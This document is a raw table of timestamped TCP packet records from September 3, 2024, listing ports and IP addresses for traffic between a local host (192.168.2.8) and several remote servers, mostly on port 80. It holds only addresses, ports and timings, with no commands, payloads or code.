Sep 3, 2024 17:13:19.577318907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577328920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577346087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577387094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577498913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577524900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577552080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577564001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577637911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577681065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577692986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577729940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577827930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577837944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577848911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577861071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577872038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577884912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.577913046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577913046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.577944040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578012943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578088045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578119040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578130007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578139067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578157902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578166008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578171968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578183889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578195095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578208923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578254938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578254938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578423023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578434944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578450918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578500032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578502893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578516960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578527927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578538895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578550100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578556061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578562021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578600883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578613043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578854084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578865051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578875065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578885078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.578915119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578926086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.578999043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579010010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579019070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579030037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579066038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579066038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579106092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579117060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579127073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579138041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579148054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579159975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579170942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579180956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579181910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579195976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579196930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579210043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579246044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579246044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579648972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579660892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579672098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579683065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579694986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.579713106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579730034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.579819918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.581305981 CEST	80	49733	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:19.581367970 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.581902027 CEST	80	49734	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:19.585786104 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.585886955 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.591439009 CEST	80	49734	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:19.667314053 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667340040 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667359114 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667378902 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667392015 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.667418957 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.667463064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.667527914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667573929 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667587042 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667638063 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.667669058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667680979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.667730093 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.668493986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.668526888 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.668539047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.668601990 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.668615103 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.668627024 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.668667078 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.669313908 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.669338942 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.669351101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.669420958 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.669455051 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.669466972 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.669481039 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.669496059 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.670209885 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.670236111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.670247078 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.670283079 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.670324087 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.670326948 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.670335054 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:19.670371056 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:19.670403004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670447111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670458078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670486927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.670536041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.670567036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670578003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670588970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670602083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670639038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.670783043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670794010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670804024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670815945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670826912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670850992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.670876026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.670964956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670978069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.670989037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671025991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671298981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671310902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671322107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671369076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671369076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671394110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671406031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671417952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671428919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671474934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671500921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671607971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671622038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671632051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671684980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671684980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671715021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671726942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671736002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671750069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671797037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671806097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671878099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671890020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671933889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671952009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.671974897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671987057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.671998024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672025919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672063112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672187090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672203064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672208071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672214031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672219038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672229052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672236919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672288895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672288895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672450066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672462940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672478914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672518015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672525883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672532082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672539949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672573090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672594070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672601938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672651052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672661066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672671080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672686100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672705889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672734976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.672928095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672939062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672949076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672980070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672990084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.672991991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673002005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673007011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673036098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673063040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673145056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673160076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673171043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673181057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673196077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673213959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673249006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673284054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673295021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673305988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673317909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673337936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673377037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673717976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673727989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673738003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673793077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673803091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673804045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673815966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673839092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673844099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673856974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673890114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673890114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.673970938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673981905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.673993111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674004078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674021959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674034119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674062967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674088955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674149990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674160957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674202919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674232960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674242973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674258947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674269915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674280882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674288034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674315929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674315929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674397945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674415112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674499035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674511909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674523115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674532890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674549103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674560070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674570084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674586058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674592018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674592018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674597025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674631119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674631119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674750090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674762964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674772978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674782991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674799919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674828053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674890041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674901962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674911022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674921036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674936056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.674952984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.674989939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675035000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675045013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675055981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675065994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675076962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675101042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675101042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675137043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675158978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675169945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675187111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675199032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675209045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675219059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675235033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675242901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675256014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675266027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675266027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675277948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.675288916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675311089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.675339937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.743783951 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.746025085 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.746970892 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:19.751782894 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.767565012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767580986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767592907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767647982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767658949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767662048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.767672062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767684937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.767688990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767703056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767736912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.767759085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.767786026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767817974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767831087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767874002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.767903090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.767971039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767982960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.767999887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.768047094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768047094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.768234968 CEST	80	49730	52.212.52.84	192.168.2.8
